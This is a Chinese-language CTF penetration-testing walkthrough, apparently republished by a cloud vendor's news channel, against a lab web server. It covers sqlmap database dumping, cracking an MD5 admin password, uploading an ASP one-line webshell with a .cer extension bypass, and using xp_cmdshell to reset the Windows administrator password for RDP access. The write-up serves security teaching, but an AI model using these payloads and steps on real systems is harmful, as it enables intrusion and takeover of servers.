您好,登錄后才能下訂單哦!
本文小編為大家詳細介紹“CTF主機滲透是實例分析”,內(nèi)容詳細,步驟清晰,細節(jié)處理妥當,希望這篇“CTF主機滲透是實例分析”文章能幫助大家解決疑惑,下面跟著小編的思路慢慢深入,一起來學習新知識吧。
第一步:我們訪問鏈接:http://202.0.0.23/
進入網(wǎng)頁首頁,通過瀏覽觀察,找到http://202.0.0.23/NewsList.asp?SortID=17 新聞資訊頁面,通過get方法提交的參數(shù)名為SortID,值為1,我們嘗試一下是否存在sql注入,通過sqlmap去跑一下。
發(fā)現(xiàn)存在sql注入漏洞
sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 –dbs
sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS –tables
sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS -T eims_flag –dump
查看賬號密碼的數(shù)據(jù)庫表
對b2076528346216b3進行md5解密,解密得密碼為admin1234賬號為root
第二步:接下來使用御劍后臺掃描,找到后臺登錄頁面
右鍵此頁面查看源碼,找到一個flag:<!--flag2{890b0c4958ef57e9264a9d2703ea7e8c}-->
第三步:使用賬戶root密碼admin1234登錄后臺,在后臺系統(tǒng)信息-文件上傳處上傳后綴為.asp的asp一句話木馬,一句話木馬內(nèi)容:<%eval request("caidao")%> (按照asp一句話木馬格式)
結(jié)果提示上傳文件格式不對,想下繞過辦法
這里我們將一句話木馬文件改一個可執(zhí)行的后綴.cer
則上傳成功
第四步:下面我們直接上菜刀工具了
在網(wǎng)站根目錄發(fā)現(xiàn)flag文件flag3{23c5b149510105853f5e7ef9a6f06627}
在數(shù)據(jù)庫配置文件中找到數(shù)據(jù)庫的賬號密碼
使用一句話木馬連接mssql數(shù)據(jù)庫
利用mssql數(shù)據(jù)庫的xpcmdshell組件執(zhí)行系統(tǒng)命令 EXEC master..xp_cmdshell 'whoami'
當前cmdshell的權(quán)限是system權(quán)限,所以直接修改administrator的密碼為hacker:EXEC master..xp_cmdshell 'net user administrator 123456'
第五步:直接遠程桌面連接服務器administrator/123456,在桌面發(fā)現(xiàn)flag文件,flag5{47baf6d9d60f40c8b1dafa56c62fcd06}
在c盤發(fā)現(xiàn)另外一個flag文件 flag4{e35a01e91e1833d266f95881ae83b4ca}
讀到這里,這篇“CTF主機滲透是實例分析”文章已經(jīng)介紹完畢,想要掌握這篇文章的知識點還需要大家自己動手實踐使用過才能領會,如果想了解更多相關內(nèi)容的文章,歡迎關注億速云行業(yè)資訊頻道。
免責聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。